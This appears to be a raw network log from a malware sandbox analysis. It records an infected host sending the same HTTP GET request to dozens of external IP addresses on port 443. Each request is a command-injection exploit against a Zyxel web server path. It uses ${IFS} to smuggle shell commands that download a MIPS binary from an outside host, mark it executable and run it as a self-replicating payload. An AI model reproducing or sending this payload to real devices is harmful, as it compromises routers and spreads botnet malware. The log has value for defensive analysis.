                                                  Jan 19, 2024 18:24:11.358392954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8279192.168.2.135659095.192.94.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358432055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8280192.168.2.1353730196.184.169.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358458996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8281192.168.2.135401651.182.234.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358511925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8282192.168.2.135789661.247.103.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358532906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8283192.168.2.1355866137.44.236.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358586073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8284192.168.2.1354730112.227.157.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358620882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8285192.168.2.1342842101.95.169.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358649015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8286192.168.2.1344026171.84.124.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358690023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8287192.168.2.134350060.44.12.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358747005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8288192.168.2.1334530184.41.111.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358797073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8289192.168.2.135133412.10.137.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358829021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8290192.168.2.1355376167.47.221.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358875036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8291192.168.2.1357716125.29.80.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358927965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8292192.168.2.1343832178.18.13.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358947039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8293192.168.2.1342524209.48.72.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.358978987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8294192.168.2.1347472178.174.177.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359026909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8295192.168.2.1343100202.59.124.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359056950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8296192.168.2.134689478.175.44.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359112978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8297192.168.2.1359148218.223.149.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359153032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8298192.168.2.1337032153.179.101.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359172106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8299192.168.2.1346650221.110.134.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359241962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8300192.168.2.1342640168.241.40.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359272957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8301192.168.2.1341838101.187.211.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359302044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8302192.168.2.1346498117.229.75.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359343052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8303192.168.2.1344038136.66.47.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359385014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8304192.168.2.134277641.245.108.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359417915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8305192.168.2.1349194113.220.150.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359467030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8306192.168.2.1355720161.158.28.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359505892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8307192.168.2.134613087.14.233.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359565020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8308192.168.2.135351673.81.248.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359571934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8309192.168.2.1347540144.182.71.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359626055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8310192.168.2.1348774221.100.239.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359661102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8311192.168.2.135816012.58.145.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359683990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8312192.168.2.1347498102.202.156.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.359730005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8313192.168.2.1357506107.78.5.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.374937057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8314192.168.2.1360448194.9.204.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373104095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8315192.168.2.1343060178.63.76.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373179913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8316192.168.2.134217043.162.112.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373222113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8317192.168.2.135627623.202.17.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373259068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8318192.168.2.136065693.246.110.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373284101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8319192.168.2.1352868122.89.144.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373349905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8320192.168.2.135855085.138.243.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373377085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8321192.168.2.1354212158.242.152.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373435020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8322192.168.2.134765445.80.11.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373471975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8323192.168.2.1334304108.5.213.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373514891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8324192.168.2.135306238.0.67.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373537064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8325192.168.2.1350362155.88.160.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373568058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8326192.168.2.133972063.171.67.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373613119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8327192.168.2.1341408197.1.94.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373661041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8328192.168.2.1357398103.242.112.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373716116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8329192.168.2.1357624131.69.113.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373744965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8330192.168.2.133740013.166.27.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373784065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8331192.168.2.134327065.244.102.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373821974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8332192.168.2.135292431.100.37.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373883963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8333192.168.2.1354114141.143.16.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373924017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8334192.168.2.1357134116.161.110.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.373955011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8335192.168.2.1346288176.212.221.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374000072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8336192.168.2.135947618.10.219.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374032974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8337192.168.2.135754235.242.104.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374085903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8338192.168.2.1334010106.95.127.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374125957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8339192.168.2.1357236106.94.154.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374181986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8340192.168.2.1343610169.181.236.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.374224901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8341192.168.2.1345020189.175.1.109443
                                                  TimestampBytes transferredDirectionData
